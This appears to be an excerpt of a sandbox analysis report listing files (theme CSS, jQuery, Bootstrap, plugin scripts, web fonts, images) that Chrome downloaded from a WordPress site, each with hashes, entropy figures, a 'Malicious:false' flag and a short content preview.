                                                                                                                                      Preview:.PNG........IHDR...............A>....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...q.8..)O.GW.Mx...@t..+.T...D.@V.V*.R...,W .\..U..:..OC|/@...$.D4.<x...8.z....i...............}4....i...K.{.._......}j..\.x.......,......ph.M..X...Z.Q....%.bc0...i.'H.......A.M.5..&_.:\f;..f..."..p.5.V.pZ.L.^.w.7..].;...4x)q9..F.2T.......a....h...!..g.J....>.E..L...U.M.)b......u(...(^.Ai.D.d.y.........w.CP....l.b..a.t..._o.......x..V.th+...9...}n..\..A.>.)._7?....M+.)n...]3...Y..Y+;..\7.....s...5....Yc...)U.......D.....UoG..%...L.....T......t..oH.z..&-%j.t.........1.&,..(5..&...f.V1 W!.cH.2EE..}...Q......b..n.j...........2P..|U.. Y.7.Q......%.~~.l\K..(.B]...mU.-r.R_.(..Q..........HKU.3.....U...LaZ...l.(U...L.+Q.b.d...XH3......`.....D...a...9uXl.FT..b4....a...3#7..=,...W.u.[...%......b.....c....A..,6.)g`..<...m.K..J`8.5[m.6i....K8cI...`Y.`A......La.H....F..".X......C.eky....lc.WvI.a9......5..:./,n.aq...e.....&......'X.....Y.-4..D.K%[Z...g....0..t...Mzy..$<..5c..X._.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (24913)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):204611
                                                                                                                                      Entropy (8bit):5.337437765004585
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:KanZeJMTk2u5SOV+UQ37410kTd3Z3PzlI7Jdt:PPTk2u5SOV+UQ37410kTFZrlI7Jdt
                                                                                                                                      MD5:8C6CD9E9AB2C2E2A115E4A6036949C6B
                                                                                                                                      SHA1:CD7949145A105A743D2AF84D16DEE22F0302A23C
                                                                                                                                      SHA-256:2D1D736027F965E57DFBD6F857286C0A15C69D840E0D986AABBE53D31D060F52
                                                                                                                                      SHA-512:DD78F0A6D59E57E6481FB361FFC0BAFE6C0F629EBE8A46B3926742C00FD884C09689F3B5D3093374F92287A4E14CB4663621539FA0280D60A0B3429E18045EA2
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/uploads/themify-concate/826651810/themify-157411406.css
                                                                                                                                      Preview:@charset "UTF-8";./* Themify Shoppe 5.7.0 framework 5.6.4 */./* vietnamese */@font-face{ font-family:'Libre Franklin'; font-style:italic; font-weight:300; font-display:swap; src:url(https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qDIbSTKq4XkRiUa6zoTjmbI.woff2) format('woff2'); unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;}/* latin-ext */@font-face{ font-family:'Libre Franklin'; font-style:italic; font-weight:300; font-display:swap; src:url(https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qDIbSTKq4XkRiUa6zsTjmbI.woff2) format('woff2'); unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}/* latin */@font-face{ font-family:'Libre Franklin'; font-style:italic; font-weight:300; font-display:swap; src:url(https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qD
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (13479)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):13577
                                                                                                                                      Entropy (8bit):5.272065782731947
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:5rprDN+sag6ifKIUpQI99P1tLm9kdgyq1+J3aCJQ+h4MPLORq:5rprxaefKI0LP19m4q1WW+h4Mjp
                                                                                                                                      MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                                                                                                      SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                                                                                                      SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                                                                                                      SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                                                                                                                                      Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 9344, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):9344
                                                                                                                                      Entropy (8bit):7.975595436620788
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:iy1J4xqYLC2akqiC1YV/R582UeGFc/AUGlF0djsT7qWPcC/Cdv:D2J7h5bV/37WUFGT7lPcC/Cdv
                                                                                                                                      MD5:CBCA61F27F93FD71171FE8D314C66AB9
                                                                                                                                      SHA1:C46A51672FFFF100945F84C3EB87826B7844A1E2
                                                                                                                                      SHA-256:F9A9A7A4B9D40BCC3047928DFA60695D53E6AE1D6EE699EA70146E171322ACAD
                                                                                                                                      SHA-512:7F9E8520DFB64197CE233AF7671A5A5643AE116478C6E2F5F67FBD8A092117126ADF1E2EDDA13FF1C19D68AEA3D04288310A2109D7C81183330F2B8DAD0785D4
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4jaVIGxA.woff2
                                                                                                                                      Preview:wOF2......$.......A`..$..........................L.. ....`?STAT^.t..|.......t.Z..N..6.$.... ..x..h....B;%c[.08.@D..=.E...O...q2.0..i......v.p.0......Y. ..P)......N.C...K,.W!.Wutp..I.2...6.....Y..X...W..z.U.nq.j^;.8.zO..gw.d.^U?p.........7.. ....S..d......d./.-.7....$...V(V(|.........c~........B[H.D(.$2.1<....N7..n.9k...D.@.(.(...H.D....qsQ."..O..{Oh..r.T.Iw..9I...rq.2.n....SW.O..\b5B.n..M.06.j..L.Sx?.........t.|z}..V...G..J....x..Co].5HC..6p..,.2..&..}`.I.n......S}'....$*..iV.[.....W......6...m.I'M...a......c...|.a.FK.d.zW9xi'Y8v..lWi....T-..F\...^p.<.TT!wvQ.i0.0.f.\.A.. .Hq..J...=/.....\.]..Dq...:..+...W..]4u*Z.._.l...e-..........k..."p....c......X..=.9..1.....2.......],.....R|J......r.x./...pa...ef.......{..&.........=.5..>....5@...x.v..o.Io.L.t[Wu^.=..Z.r?xV..V..jV..`...+.2..8..P....[.r.....4.,Y....&.|.W<..7..Y.s.=,2..A.i..je..P..`pV..!VW-...`.>YBRJY[...!rY5...l........Z.5_..B.....cP.....v1....(.5...[....n.....vlx=I.*1..9R....=..2..u\..p...iFD...
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):48236
                                                                                                                                      Entropy (8bit):7.994912604882335
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:uj6JxavgLx5rjTH3CdZ3y11o4uMb2IVEhiB6z6GAAHJApICtBgso6HaOjTXHRWK:ujoa4LxZPCdm3B2IVEhiB62apApISxos
                                                                                                                                      MD5:015C126A3520C9A8F6A27979D0266E96
                                                                                                                                      SHA1:2ACF956561D44434A6D84204670CF849D3215D5F
                                                                                                                                      SHA-256:3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
                                                                                                                                      SHA-512:02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
                                                                                                                                      Preview:wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S*...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2...*......C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (519)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):5028
                                                                                                                                      Entropy (8bit):5.322287295780083
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:bdZGbrCLDKDr4CCqqBOclmECx77IqEuRU2ED+DIuxjKyIDMbQnrVBV+fU+GSK/ex:ZKXYC4qjfKpLrVBVqEol0qBVSVLbA
                                                                                                                                      MD5:79FE651C401623C3988A99F6AFEEA6DB
                                                                                                                                      SHA1:00745EC77EC45B8DD0429F427E2D3BCE51BCDC17
                                                                                                                                      SHA-256:0C2E00DDFBD10E2986C25A37E6E72997F9D61864EFD0030DE6D5DAB5656BD91B
                                                                                                                                      SHA-512:2FCFD4D3ECFD993D4437E804533DBB9976E57DDFB573416E856CD8FF9D24F77F8278771440150A4E95FE7D26C671E12219B8ACCA9A7151E609B494DCE9C0C871
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/plugins/loading-page/js/loading-page.min.js?ver=free-1.1.10
                                                                                                                                      Preview:var $jscomp=$jscomp||{};$jscomp.scope={};$jscomp.findInternal=function(a,e,b){a instanceof String&&(a=String(a));for(var f=a.length,g=0;g<f;g++){var h=a[g];if(e.call(b,h,g,a))return{i:g,v:h}}return{i:-1,v:void 0}};$jscomp.ASSUME_ES5=!1;$jscomp.ASSUME_NO_NATIVE_MAP=!1;$jscomp.ASSUME_NO_NATIVE_SET=!1;$jscomp.SIMPLE_FROUND_POLYFILL=!1;.$jscomp.defineProperty=$jscomp.ASSUME_ES5||"function"==typeof Object.defineProperties?Object.defineProperty:function(a,e,b){a!=Array.prototype&&a!=Object.prototype&&(a[e]=b.value)};$jscomp.getGlobal=function(a){return"undefined"!=typeof window&&window===a?a:"undefined"!=typeof global&&null!=global?global:a};$jscomp.global=$jscomp.getGlobal(this);.$jscomp.polyfill=function(a,e,b,f){if(e){b=$jscomp.global;a=a.split(".");for(f=0;f<a.length-1;f++){var g=a[f];g in b||(b[g]={});b=b[g]}a=a[a.length-1];f=b[a];e=e(f);e!=f&&null!=e&&$jscomp.defineProperty(b,a,{configurable:!0,writable:!0,value:e})}};$jscomp.polyfill("Array.prototype.find",function(a){return a?a:funct
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (5028), with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):7170
                                                                                                                                      Entropy (8bit):5.555239269171433
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:sY2PYd3lvjVMjg/Ozt5wQVxGuGBEjdC3BeVxGpGlwDJTV9FsMEiLFGzg8:sY2PUVvjv45wmVyEjGoGSuJTVwzg8
                                                                                                                                      MD5:1620FD101C31D13E5D41FAE01A58C355
                                                                                                                                      SHA1:C9F381B89CAA72938BE1A03F380906A125DF3D41
                                                                                                                                      SHA-256:37CF4E62F1C225AF61F2CD2303BC3AF2ECF1E18E28E57124C05B889031FF5377
                                                                                                                                      SHA-512:F6C88586105DCC02D6FCC17C443D3E6A04B346FF71F794184FDC9509C28BC7AE61AE3A50664ADF15E6B30E04623BBEDC4EB9B88D027F43519BF45A96CDE2A936
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/themes/themify-shoppe/themify/js/modules/edge.Menu.js?ver=5.6.4
                                                                                                                                      Preview:/**.. *Edge menu module.. */..;..(($, doc)=>{.. const mouseEnter=function () {.....const target = this.tagName === 'A' ? this.parentNode : this;.. /* prevent "edge" classname being removed by mouseleave event when flipping through menu items really fast */.. const timeout= target.getAttribute('data-edge_menu_t');.. if(timeout){.. clearTimeout(timeout);.. }.. const elm =$(target.getElementsByTagName('ul')[0]);....... if ((elm.offset().left+elm.width()) > Themify.w) {.. target.classList.add('edge');.. }.. },.. mouseLeave=function (e) {.. if(e.target.closest('.edge')){.. return;.. }.....const target = this.tagName === 'LI' ? this : this.parentNode;.. const t = setTimeout(()=>{.. target.classList.remove('edge');.. }, 300);.. target.setAttribute('data-edge_menu_t', t);.. },..
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (50904)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):51143
                                                                                                                                      Entropy (8bit):5.326929815728177
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:bVCSRfsdjHVpcKc2v5dTq7gBaBIzySppHcWFcXPv1mAaCcE1dLPmdwGmo:bVDROhicBaBD0pHcWFcfv1mrCcws
                                                                                                                                      MD5:BAAADEA4492B059F284187D75AF46063
                                                                                                                                      SHA1:7326BF5E023F871AFCF6EBB18CB89109F81A7708
                                                                                                                                      SHA-256:0E25895D7CAAF355A53D19C37C69A06198F668E5422B211D27597ED93983B80B
                                                                                                                                      SHA-512:B56367CD0554D9E5D12103E2BE34E304433B898DB5D78439A4E04845168E413D90875024E3C5583CDE3ED8AA68989A5C7AB37AA51163E65FB72E7C50D1DB587D
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js
                                                                                                                                      Preview:/*!. * Bootstrap v4.0.0-beta (https://getbootstrap.com). * Copyright 2011-2017 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery. jQuery must be included before Bootstrap's JavaScript.");!function(t){var e=jQuery.fn.jquery.split(" ")[0].split(".");if(e[0]<2&&e[1]<9||1==e[0]&&9==e[1]&&e[2]<1||e[0]>=4)throw new Error("Bootstrap's JavaScript requires at least jQuery v1.9.1 but less than v4.0.0")}(),function(){function t(t,e){if(!t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!e||"object"!=typeof e&&"function"!=typeof e?t:e}function e(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Super expression must either be null or a function, not "+typeof e);t.prototype=Object.create(e&&e.prototype,{constructor:{value:t,enumerable:!1,writable:!0,con
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (1572)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):22388
                                                                                                                                      Entropy (8bit):5.341413406153424
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:w/A85q1H6uy2rbqGIwYRe1qW/uaDqPN6uyIrbqGIwY7w1Mh/ZFgqsC6uyrrbqGIb:mUhq9IW/q935Cq9P4Fq9T
                                                                                                                                      MD5:E861F41E0B09E97ED35A2880516F3225
                                                                                                                                      SHA1:826A80302720DB768C0BE873842201563905D58E
                                                                                                                                      SHA-256:ECAE33EB25B1DBCA55FC3C77886E4E01548BC694AFA636EB221F7A0A9F7F43AB
                                                                                                                                      SHA-512:6F93E81786217D535D3423A03260D378551037A70BC04EBC525319A2AD97990BF5CEAAF6A664FE1D01F3D47AE725762214FD13B0FCCAE5D8F3C006655E5D5635
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:"https://fonts.googleapis.com/css?family=Open+Sans:400,600,700,800"
                                                                                                                                      Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Open Sans';. font-style: normal;
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (1675), with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):1675
                                                                                                                                      Entropy (8bit):5.280202056022176
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:wWdYEvT9fUSOHCK2L5yjgu52WWTi2UDsYw3t8E7q4JRarnq9Ksht3K839U4n:xTPL5yEWV2UDsYw3tN7BJRarqJht683L
                                                                                                                                      MD5:47C028011AFCBE91CE913C778FA22BA4
                                                                                                                                      SHA1:53B73D44CD08FEED8C5C7F6EE11FB5ACE9324F89
                                                                                                                                      SHA-256:5D89CD564FE48479E46457E873A9639B5CC7042D850E4FC565F26D8B7BC99961
                                                                                                                                      SHA-512:EBE2471F26F7A4C8B60086ED2930D79E3152E734B94D4AEE345E149566EAEFA77BB645B69BB2D8D0D49B85E70A19B75FAC42F1C5E7489EA01E6393AFD275AD61
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/plugins/loading-page/loading-screens/bar/loading-bar.js?ver=free-1.1.10
                                                                                                                                      Preview:var cp_loadingpage=cp_loadingpage||{};cp_loadingpage.graphics=cp_loadingpage.graphics||{};cp_loadingpage.graphics.bar={created:!1,attr:{},create:function(a){a.backgroundColor=a.backgroundColor||"#000000";a.height=a.height||1;a.foregroundColor=a.foregroundColor||"#FFFFFF";var b={width:"100%",height:"100%",backgroundColor:a.backgroundColor,position:"fixed",zIndex:666999,top:0,left:0};a.backgroundImage&&(b.backgroundImage="url("+a.backgroundImage+")",b["background-repeat"]=a.backgroundRepeat,b["background-position"]="center center","no-repeat"==b["background-repeat"].toLowerCase()&&"undefined"!==typeof a.fullscreen&&1==1*a.fullscreen&&(b["background-attachment"]="fixed",b["-webkit-background-size"]="contain",b["-moz-background-size"]="contain",b["-o-background-size"]="contain",b["background-size"]="contain"));this.attr.overlay=jQuery("<div class='lp-screen'></div>").css(b).appendTo("html");this.attr.bar=jQuery("<div class='lp-screen-graphic'></div>").css({height:a.height+"px",marginTop:"-
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (5028), with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):16244
                                                                                                                                      Entropy (8bit):5.049397088034778
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:8sCoucEIIU50UBo9r7J1Bj2jv45wmVyEjGoGSuJTVwzg8:8qEV/tfov45tKJTV2
                                                                                                                                      MD5:BB8BF2D27067DFF621CC771617970F8D
                                                                                                                                      SHA1:24366FD7911857C4F9AE33CD80CE2C3418F56526
                                                                                                                                      SHA-256:1B7BBCE8501F815FF6BFE2D513D9F2B0C1E814D257B910EC5B188C153A96279F
                                                                                                                                      SHA-512:0FF0BE6B7D2C00537DBEF137FBFB3F21346BB51B7B7DB59494173B9C67C768211016B4A8622466694D7C1A66632C6A220904D6A299F419DECCAF9CA36925C7C0
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/themes/themify-shoppe/js/themify.script.js?ver=5.7.0
                                                                                                                                      Preview:/* Themify Theme Scripts - https://themify.me/ */..;..(($, Themify, win, doc, fwVars, themeVars)=> {.. 'use strict';.. const ThemifyTheme = {.. bodyCl: Themify.body[0].classList,.. v: fwVars.theme_v,.. headerType: themeVars.headerType,.. url: fwVars.theme_url + '/',.. init() {.. this.darkMode();.. Themify.megaMenu(doc.getElementById('main-nav'));.. this.headerRender();.. this.clickableItems();.. this.headerVideo();.. this.fixedHeader();.. this.wc();.. setTimeout(()=>{this.loadFilterCss();}, 800);.. setTimeout(()=>{this.backToTop();}, 2000);.. this.resize();.. this.doInfinite(doc.getElementById('loops-wrapper'));.. setTimeout(()=>{this.commentAnimation();}, 3500);.. this.builderActive();.. if (doc.getElementById('mc_embed_signup')) {.. Themify.LoadCss(this.url + 'styles/modules/ma
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 18668, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):18668
                                                                                                                                      Entropy (8bit):7.988119248989337
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:1stcBfAVaR8i6XzMsb4fcjakBudFyBqrgeU0hipgwfqj09nOt/a:1k0F6Xz1bFjaPbyBqr9hIgkM3Fa
                                                                                                                                      MD5:8655D20BBCC8CDBFAB17B6BE6CF55DF3
                                                                                                                                      SHA1:90EDBFA9A7DABB185487B4774076F82EB6412270
                                                                                                                                      SHA-256:E7AF9D60D875EB1C1B1037BBBFDEC41FCB096D0EBCF98A48717AD8B07906CED6
                                                                                                                                      SHA-512:47308DE25BD7E4CA27F59A2AE681BA64393FE4070E730C1F00C4053BAC956A9B4F7C0763C04145BC50A5F91C12A0BF80BDD4B03EECC2036CD56B2DB31494CBAF
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVI.woff2
                                                                                                                                      Preview:wOF2......H...........H..........................|.....h.`?STAT^..0..|...........+..2..6.$..`. ..x........z'o..w;....6.E....6....E...'$H.#.....n1X..JU/.d.O..JC.'J".v.v.l.h.....u.S...SY.....B.hz.o.}......W......%m6...A..=....\..m. .]..~.[..........]...I.*.h.=.....6.xt..F....Lt...Qs-.7..{...~BI.".F.Q......F...P..dMw..#I2........Rq.Q&.0@.;..;...3VG..:c.nki..-Q..2##e.u...8n....\?....T..b....^..#...../.J|OM..St....e.S.}!.....>..i.T/a.ES%.W.P3..`..a.R.A.....!~g..74.np8o.....d[6?.P.4)P.....AG.3.......;#0.y....M..O/2.@.4..N.vA$.:M&H,.AT".........@..a.~..L->...0@h...~.._..N"......t......C./g7..............2E.N.J...TW.F..."A.B...n.......i.?.{\.L.!*.B..x...S..!........?.\,... .@.....y"xw.A8.w..!E..-^P O..+.T.r.R.zz..K..].E.....Ri.)g.P...j..w..c.M.F.v../........Q....'...(....X..;.K.!BZ3.........f.....N.A(....cA`.b'...`.~sa*^.....?..../.L.S......t..`@h..C.....>N.W...;>..._h.+~=|......uOGA{.7.....h....q.d.4$.x<.....^0|...@....@Q[RC.0....b....'...*RID
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (24913)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):204639
                                                                                                                                      Entropy (8bit):5.337611431393741
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:KanZeJMTk2u5SOV+UQ37410kTd3Z3PzlI7JdY:PPTk2u5SOV+UQ37410kTFZrlI7JdY
                                                                                                                                      MD5:A6D6F0A5B631E99A12F41999568A8931
                                                                                                                                      SHA1:AF745F67CBEE785265E05F7F31B2C2D300D4EA6C
                                                                                                                                      SHA-256:8FD8C287A1050D0402FF6B5BBE6B172555729A56E5CF14A77D76CBCB0C8D77AB
                                                                                                                                      SHA-512:B2C5455FE3886624EF769674774A3628AABEB9ECC75A0BCB6F24173ACCB5736CFFB78A4CF8A17BCF9CA47BAFEE934A6485CA6AA67F78E87CFC0B8A6447FB4D5A
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/uploads/themify-concate/826651810/themify-701353600.css
                                                                                                                                      Preview:@charset "UTF-8";./* Themify Shoppe 5.7.0 framework 5.6.4 */./* vietnamese */@font-face{ font-family:'Libre Franklin'; font-style:italic; font-weight:300; font-display:swap; src:url(https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qDIbSTKq4XkRiUa6zoTjmbI.woff2) format('woff2'); unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;}/* latin-ext */@font-face{ font-family:'Libre Franklin'; font-style:italic; font-weight:300; font-display:swap; src:url(https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qDIbSTKq4XkRiUa6zsTjmbI.woff2) format('woff2'); unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}/* latin */@font-face{ font-family:'Libre Franklin'; font-style:italic; font-weight:300; font-display:swap; src:url(https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qD
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x1350, components 1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):367441
                                                                                                                                      Entropy (8bit):7.965310641430513
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:1a5QlTZfVsyKneDSeZ2aZ6wVJHQXtUD3YGyG08LW1Fult1Pv2DM:oAZNlKne+02aPTyq7YGy8LW1cvuM
                                                                                                                                      MD5:0280C5A8583B9CB44CCDFC0BE581E68A
                                                                                                                                      SHA1:FE82A13558E69C1E6667192A67B7C294184BBAE1
                                                                                                                                      SHA-256:88E78D3220554F98BB2CA2FD3C1386D0243079AB7796571C55624AE33E723BD7
                                                                                                                                      SHA-512:31A124EEA6CB73B8FBF473467BD8CAC9DBD138CB2AC2A3ADBED0F72FF321DAD45180E852CFE481CFEF6CC5C5D508B2392DC61C339DCEF0182D82F543653528A8
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
